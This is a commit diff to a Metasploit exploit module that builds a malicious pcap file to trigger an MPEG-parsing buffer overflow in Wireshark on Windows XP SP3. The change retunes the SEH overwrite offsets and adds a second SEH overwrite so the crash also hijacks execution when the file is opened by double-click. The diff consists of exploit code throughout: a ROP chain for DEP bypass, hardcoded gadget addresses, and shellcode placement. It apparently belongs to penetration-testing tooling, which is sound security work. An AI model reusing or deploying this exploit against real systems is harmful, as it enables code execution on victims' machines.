It's solved the crash when double-click on the pcap file

2014-04-21 17:49:40 +01:00 · 2014-04-21 17:49:40 +01:00 · e25ca64641
parent 3861541204
commit e25ca64641
1 changed files with 22 additions and 9 deletions
--- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb
+++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb
@ -47,7 +47,8 @@ class Metasploit3 < Msf::Exploit::Remote
        [
          [ 'WinXP SP3 Spanish (bypass DEP)',
            {
-              'OffSet' => 70692,
+              'OffSet' => 69732,
+              'OffSet2' => 70476,
              'Ret'    => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 
              'jmpesp' => 0x68e2bfb9,
            }
@ -94,18 +95,30 @@ class Metasploit3 < Msf::Exploit::Remote
  def exploit

    print_status("Creating '#{datastore['FILENAME']}' file ...")
-    magic_header = "\xff\xfb\x41"                # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
-    packet = rand_text_alpha(891)
+
    ropchain = create_rop_chain
+    magic_header = "\xff\xfb\x41"                # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
+    # Here we build the packet data
+    packet = rand_text_alpha(883)
+    packet << "\x6c\x7d\x37\x6c" # NOP RETN
+    packet << "\x6c\x7d\x37\x6c" # NOP RETN
    packet << ropchain
-    packet << payload.encoded      							# Shellcode
+    packet << payload.encoded                                                           # Shellcode
    packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
-    # SEH pointers overwrite (nseh & seh) 
-    packet << make_nops(4) # nseh
-    # \0xff is a badchar then we can't make a jump back with jmp $-2000
+
+    # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
    # After nseh and seh we haven't space, then we have to jump to another location.
-    # 0x6b805955 :  # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [libjpeg-8.dll] **   |   {PAGE_EXECUTE_REA
-    packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN 
+
+    # When file is open with command line. This is NSEH/SEH overwrite
+    packet << make_nops(4) # nseh
+    packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
+
+    packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk
+
+    # When file is open with GUI interface. This is NSEH/SEH overwrite
+    packet << make_nops(4) # nseh
+    packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [libjpeg-8.dll] **
+
    print_status("Preparing payload")
    filecontent = magic_header
    filecontent << packet